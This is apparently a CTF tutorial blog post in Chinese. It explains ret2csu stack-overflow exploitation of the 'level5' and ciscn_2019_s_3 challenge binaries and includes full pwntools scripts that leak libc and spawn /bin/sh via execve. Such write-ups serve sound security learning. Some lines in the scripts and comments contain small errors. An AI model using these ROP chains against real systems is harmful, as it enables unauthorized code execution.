Ret2csu level5 & ciscn_2019_s_3

已于 2023-02-21 15:56:22 修改
阅读量559 收藏 4
点赞数 5
分类专栏: Pwn 文章标签: python linux 网络安全 学习 网络
于 2022-11-06 12:06:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127701422
版权
本文介绍了一种针对64位程序中的栈溢出漏洞进行利用的方法,包括构造Exploit的具体步骤,以及如何在两个不同示例中利用__libc_csu_init中的gadget来实现漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本题难点:对栈的理解需要稍微更深入一点

ciscn_s_3 建议去看本人最新文章BUUCTF Ret2Csu ciscn_s_3

1.Checksec & IDA Pro

 

开启了栈不可执行与部分RELRO

 

 没有 system , /bin/sh,得自己构造。

看一眼 main 函数 与 vulnerable_function

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  vulnerable_function(1LL);
  return 0;
}

vulnerable_function

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  return read(0, buf, 0x200uLL);
}

2.源码分析:

很显然,vulnerable_function 存在栈溢出漏洞。

read 函数不检查输入的字符串长度。buf变量与rsp的距离为0,因此buf的起始地址就是rsp的地址。从buf的rsp到rbp的大小总共为0x80+0x08,其中0x08为buf后的ret地址。

3.构造Exp

构造Exp思路如下:

1.利用pwntools查找writereadmain函数的got表地址与bss段的段起始地址

2.利用栈溢出执行通用gadget,__libc_csu_init 中的gadget,并再次执行main函数为接下来做准备

3.通过got表地址泄露真实地址的后3位,查找Libc版本并查找execve地址

4.再次溢出栈,执行 __libc_csu_init 的gadget,利用got表中的read函数地址执行read,向bss段写入execve函数地址与/bin/sh字符串,再次执行为接下来做准备

5.最后再溢出一次栈,执行 __libc_csu_init 的gadget,执行写入bss段中的 execve('/bin/sh')

因为 PIE 未开启,因此可以直接使用 IDA Pro 中获取的 __libc_csu_init 中的gadget地址。

分别是:

.text:0000000000400600                               loc_400600:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400600 4C 89 EA                      mov     rdx, r13
.text:0000000000400603 4C 89 F6                      mov     rsi, r14
.text:0000000000400606 44 89 FF                      mov     edi, r15d
.text:0000000000400609 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]
.text:0000000000400616                               loc_400616:                             ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400616 48 83 C4 08                   add     rsp, 8
.text:000000000040061A 5B                            pop     rbx
.text:000000000040061B 5D                            pop     rbp
.text:000000000040061C 41 5C                         pop     r12
.text:000000000040061E 41 5D                         pop     r13
.text:0000000000400620 41 5E                         pop     r14
.text:0000000000400622 41 5F                         pop     r15
.text:0000000000400624 C3                            retn

在64位程序中,函数传参是通过寄存器与栈进行的。

 write函数的原型:

ssize_t write (int fd, const void * buf, size_t count)

fd 为文件描述符,fd为1时为标准输出

buf 需要输出的内存地址

count 输出字节数

 正好对上第一部分 __libc_csu_init 的 gadget

text:0000000000400600                               loc_400600:
.text:0000000000400600 4C 89 EA                      mov     rdx, r13
.text:0000000000400603 4C 89 F6                      mov     rsi, r14
.text:0000000000400606 44 89 FF                      mov     edi, r15d
.text:0000000000400609 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]

但是发现 在 __libc_csu_init 的gadget中,我们需要先在 r13 , r14 , r15d 中放置我们的 1 , write_got , 8

因此就需要用到第二部分gadget

.text:0000000000400616                               loc_400616:
.text:0000000000400616 48 83 C4 08                   add     rsp, 8
.text:000000000040061A 5B                            pop     rbx
.text:000000000040061B 5D                            pop     rbp
.text:000000000040061C 41 5C                         pop     r12
.text:000000000040061E 41 5D                         pop     r13
.text:0000000000400620 41 5E                         pop     r14
.text:0000000000400622 41 5F                         pop     r15
.text:0000000000400624 C3                            retn

因此可得出我们的通用gadget函数

def csu( rbx , rbp , r12 , r13 , r14 , r15 , arg ):

	payload = b'A' * ( 0x80 + 0x08 ) # 溢出栈 buf 大小以及返回地址为 0x80 + 0x08
	payload += p64(csu_rear) # 先调用第二部分gadget,把 rbx , rbp , r12 , r13 , r14 , r15 送入栈中
	payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload += p64(csu_front) # 调用第一部分gadget,将 r13 , r14 , r15 送出栈
	payload += b'A' * 0x38 # 平衡栈堆
	payload += p64(arg) # arg为返回地址,在本文使用main_addr。返回main函数再次执行方便下次溢出
	io.send(payload)
	sleep(1) # 等待接收

其中 rbx 必须为0 ,rbp必须为1

因为:

.text:000000000040060D 48 83 C3 01                   add     rbx, 1
.text:0000000000400611 48 39 EB                      cmp     rbx, rbp
.text:0000000000400614 75 EA                         jnz     short loc_400600

通用gadget:

def csu( rbx , rbp , r12 , r13 , r14 , r15 , arg ):

	payload = b'A' * ( 0x80 + 0x08 )
	payload += p64(csu_rear)
	payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload += p64(csu_front)
	payload += b'A' * 0x38
	payload += p64(arg)
	io.send(payload)
	sleep(1)

通过使用函数赋值,如

csu( 0 , 1 , write_got , 8 , write_got , 1 , main_addr )

 第一阶段的Payload解决。

然后是接收泄露的地址:

write_addr = u64(io.recv(8))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
execve_addr = libc_base + libc.dump('execve')

 将 /bin/sh\x00 写入bss段:

io.recvuntil('Hello, World\n')
csu( 0 , 1 , read_got , 16 , bss_base , 0 , main_addr )
io.send(p64(execve_addr) + b'/bin/sh\x00')

执行写入bss段的 execve('/bin/sh'):

io.recvuntil('Hello, World\n')
csu( 0 , 1 , bss_base , 0 , 0 , bss_base + 8 , main_addr )
io.interactive()

完整Payload:

from pwn import *
from LibcSearcher import *

io = process("/root/Desktop/PwnSubjects/level5")
elf = ELF("/root/Desktop/PwnSubjects/level5")

csu_front = 0x400600
csu_rear = 0x40061A
main_addr = 0x400587

write_got = elf.got['write']
read_got = elf.got['read']
bss_base = elf.bss()

def csu( rbx , rbp , r12 , r13 , r14 , r15 , arg ):

	payload = b'A' * ( 0x80 + 0x08 )
	payload += p64(csu_rear)
	payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
	payload += p64(csu_front)
	payload += b'A' * 0x38
	payload += p64(arg)
	io.send(payload)
	sleep(1)

io.recvuntil('Hello, World\n')
csu(0 , 1 , write_got , 8 , write_got , 1 , main_addr)

write_addr = u64(io.recv(8))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
execve_addr = libc_base + lib c.dump('execve')

log.success('real_addr: ' + hex(write_addr))
log.success('execve_addr: ' + hex(execve_addr))

io.recvuntil('Hello, World\n')
csu( 0 , 1 , read_got , 16 , bss_base , 0 , main_addr )
io.send(p64(execve_addr) + b'/bin/sh\x00')

io.recvuntil('Hello, World\n')
csu( 0 , 1 , bss_base , 0 , 0 , bss_base + 8 , main_addr )
io.interactive()

接下来我们来看一道例题:BUUCTF的ciscn_2019_s_3

1.Checksec & IDA Pro

int __cdecl main(int argc, const char **argv, const char **envp)
{
  return vuln();
}
signed __int64 vuln()
{
  signed __int64 v0; // rax
  char buf[16]; // [rsp+0h] [rbp-10h] BYREF

  v0 = sys_read(0, buf, 0x400uLL);
  return sys_write(1u, buf, 0x30uLL);
}

2.源码分析:

不难看出溢出点在 vuln 中

read尝试读入一个长度为10的buf,但是write识图读出一个长度为30的buf ,其中有0x20是空余的。

在__libc_csu_init中发现了通用gadget:

.text:0000000000400580                               loc_400580:
.text:0000000000400580 4C 89 EA                      mov     rdx, r13
.text:0000000000400583 4C 89 F6                      mov     rsi, r14
.text:0000000000400586 44 89 FF                      mov     edi, r15d
.text:0000000000400589 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]
.text:0000000000400596                               loc_400596:
.text:0000000000400596 48 83 C4 08                   add     rsp, 8
.text:000000000040059A 5B                            pop     rbx
.text:000000000040059B 5D                            pop     rbp
.text:000000000040059C 41 5C                         pop     r12
.text:000000000040059E 41 5D                         pop     r13
.text:00000000004005A0 41 5E                         pop     r14
.text:00000000004005A2 41 5F                         pop     r15
.text:00000000004005A4 C3                            retn

看得出来,可以直接复用之前的通用gadget

只需要修改一下 csu_front 和 csu_rear 即可。

但是我们在 IDA Pro 中并未发现 write 与 read 函数

但是发现了函数 gadgets

__int64 gadgets()
{
  return 15LL;
}

乍一看其实看不出啥,查看反汇编

.text:00000000004004D6                               public gadgets
.text:00000000004004D6                               gadgets proc near
.text:00000000004004D6                               ; __unwind {
.text:00000000004004D6 55                            push    rbp
.text:00000000004004D7 48 89 E5                      mov     rbp, rsp
.text:00000000004004DA 48 C7 C0 0F 00 00 00          mov     rax, 0Fh
.text:00000000004004E1 C3                            retn
.text:00000000004004E1
.text:00000000004004E1                               gadgets endp ; sp-analysis failed
.text:00000000004004E1
.text:00000000004004E2                               ; ---------------------------------------------------------------------------
.text:00000000004004E2 48 C7 C0 3B 00 00 00          mov     rax, 3Bh ; ';'
.text:00000000004004E9 C3                            retn
.text:00000000004004E9
.text:00000000004004E9                               ; ---------------------------------------------------------------------------
.text:00000000004004EA 90                            db 90h
.text:00000000004004EB                               ; ---------------------------------------------------------------------------
.text:00000000004004EB 5D                            pop     rbp
.text:00000000004004EC C3                            retn
.text:00000000004004EC                               ; } // starts at 4004D6

这部分是之后用来系统调用的。

其中

mov rax,0Fh    //   0Fh  即15    而15 对应的是 sys_rt_sigreturn系统调用
mov rax,3Bh     //  3Bh  即 59    而15 对应的是  sys_execve 系统调用

3.如何计算 /bin/sh 的偏移:

在main下断点

一步一步直到 call vuln

下一步,输入 aaaa

 随后 search aaaa 查找aaaa

 

再使用 x /8gx 查找对应地址

 

用 0x00007fffffffe048 - 0x7fffffffdf00 使用pwndbg的 distance 函数也行

 偏移即为 0x148

4.构造Payload 

payload = b'/bin/sh\x00' + p64(rdi_addr) + p64(csu_rear)
# rbp . r12 . r13 . r14 . r15
payload += p64(0) + p64(bin_sh_addr + 0x08) + p64(0) + p64(0) +p64(bin_sh_addr)
payload += p64(csu_front) + p64(execve_call) + p64(rdi_addr) + p64(bin_sh_addr) + p64(syscall)

 完整Payload:

from pwn import *
from LibcSearcher import *

io = process("/root/Desktop/PwnSubjects/ciscn_s_3")
elf = ELF("/root/Desktop/PwnSubjects/ciscn_s_3")

csu_front = 0x400580
# mov rdx , r13
# mov rsi , r14
# mov edi . r15d
csu_rear = 0x40059B
# pop rbp
# pop r12
# pop r13
# pop r14
# pop r15
# ret
main_addr = 0x400587
execve_call = 0x4004E2
# mov rax , 3BH
vuln_addr = 0x4004ED
rdi_addr = 0x4005A3
syscall = 0x400501

context.log_level = 'debug'

payload_leak = b'/bin/sh\x00' + b'A' * 8 + p64(vuln_addr)
io.sendline(payload_leak)
io.recv(0x20)
stack_addr = u64(io.recv(8))
print(hex(stack_addr))
bin_sh_addr = stack_addr - 0x148

payload = b'/bin/sh\x00' + p64(rdi_addr) + p64(csu_rear)
# rbp . r12 . r13 . r14 . r15
payload += p64(0) + p64(bin_sh_addr + 0x08) + p64(0) + p64(0) +p64(bin_sh_addr)
payload += p64(csu_front) + p64(execve_call) + p64(rdi_addr) + p64(bin_sh_addr) + p64(syscall)

io.sendline(payload)
io.interactive()

不知道为什么这题本地需要用 0x148 才能打通,远程需要 0x118

【pwn】ciscn_2019_s_3
Nothing
12-14 4722
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2019_s_3
m0_52231248的博客
11-16 1293
ciscn_2019_s_3 Checksec: Ida: 看到代码量很少,同时出现了syscall基本上这题就是srop了。 接下来确定溢出,offest=0x10 srop :伪造 sigreturn frame 去 伪造 execve("/bin/sh",0,0) 来 getshell 我们已经确定了offest还需要完成 1,需要知道栈的地址(比如需要知道自己构造的字符串`/bin/sh`的地址); 2,需要知道`syscall`指令在内存中的地址; 3,需要知
BUU刷题记录(三)
山高路远
04-10 3134
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类题目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这题,一直想完整的了解栈迁移,借着这题真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
syscall指令_ctf中关于syscall系统调用的简单分析
weixin_36190812的博客
12-28 411
原创 紫色仰望 合天智汇0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read():ssize_t read(int fd,const void...
2021-10-20 MSSCTF_2021_Finals_WP
m0_56897090的博客
10-20 785
文章目录CryptoBlock_of_Hash_new题目代码题目分析EXPRight_now题目代码题目分析EXPBLOCK_OF_HASH_2021题目代码题目分析EXPOFB_2021题目代码题目分析EXPPWNelfBuychunk_MSSCTF2021Finals笔记EXPshellcode_MSSCTF2021Finals笔记EXPsignin_MSSCTF2021Finals笔记EXPWhereIsGadgets_MSSCTF2021Finals笔记EXPReserveGIFT_MSSCTF2
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1481
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1799
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1434
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 430
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 593
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
【BUUCTF - PWN】ciscn_2019_s_3
古月浪子的博客
04-17 827
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
BUUCTF ciscn_2019_s_3
最新发布
zwb2603096342的博客
07-11 1410
ret2csu,gdb查找stack,srop的利用
csicn_2019_s_3
Morphy_Amo的博客
03-06 419
万能gadget、SROP
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1956
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
2019ciscn_s_3
Hyrink的博客
06-07 592
ciscn_s_3的两种解法:SROP & ret2csu详解
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1703
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
"ret_code=1&agent_id=&bill_id=&jnet_bill_no=&bill_status=&card_real_amt=&card_settle_amt=&card_detail_data=&ret_msg=无效的订单号&ext_param=&sign=581f1d192ecc2568ca153069dbe17dfb"截取字符串变成键值对数组
05-31
可以通过以下步骤将该字符串截取成键值对数组: 1. 先使用 `explode()` 函数将字符串按照 `&` 分割成数组; 2. 遍历数组,再使用 `explode()` 函数将每个元素按照 `=` 分割成键值对; 3. 将键值对以关联数组形式存储起来。 可以参考下面的代码示例: ```php $str = "ret_code=1&agent_id=&bill_id=&jnet_bill_no=&bill_status=&card_real_amt=&card_settle_amt=&card_detail_data=&ret_msg=无效的订单号&ext_param=&sign=581f1d192ecc2568ca153069dbe17dfb"; // 将字符串按照 & 分割成数组 $arr = explode('&', $str); // 遍历数组,将每个元素按照 = 分割成键值对 $params = []; foreach ($arr as $item) { $pair = explode('=', $item); $key = $pair[0]; $value = isset($pair[1]) ? $pair[1] : ''; $params[$key] = $value; } // 输出结果 print_r($params); ``` 输出结果如下: ``` Array ( [ret_code] => 1 [agent_id] => [bill_id] => [jnet_bill_no] => [bill_status] => [card_real_amt] => [card_settle_amt] => [card_detail_data] => [ret_msg] => 无效的订单号 [ext_param] => [sign] => 581f1d192ecc2568ca153069dbe17dfb ) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值